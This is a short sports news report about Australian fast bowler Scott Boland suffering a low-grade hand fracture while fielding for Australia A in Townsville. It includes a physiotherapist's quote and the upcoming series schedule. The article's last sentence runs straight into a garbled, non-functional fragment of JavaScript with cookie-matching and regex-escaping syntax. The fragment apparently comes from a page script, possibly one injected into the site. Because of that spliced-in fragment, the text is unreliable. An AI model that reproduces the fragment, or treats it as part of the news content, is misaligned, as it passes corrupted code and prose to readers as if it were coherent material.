Victorian fast bowler Scott Boland has suffered a fractured hand while fielding for Australia A in Townsville.

Boland is likely to miss the remainder of the quadrangular A series against South Africa, India and the National Performance squad.

"Scott Boland sustained a low grade fracture of the right hand on the final day of the four-day match in Townsville," team physiotherapist Kevin Sims said.

"Scott will return to Melbourne for further medical review.

"We will then decide whether he re-joins the squad for the back-end of the Quadrangular A Series for the one-day and four-day matches."

Australia A's one-day series concludes on September 4, before two four-day matches against India A in mid September. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
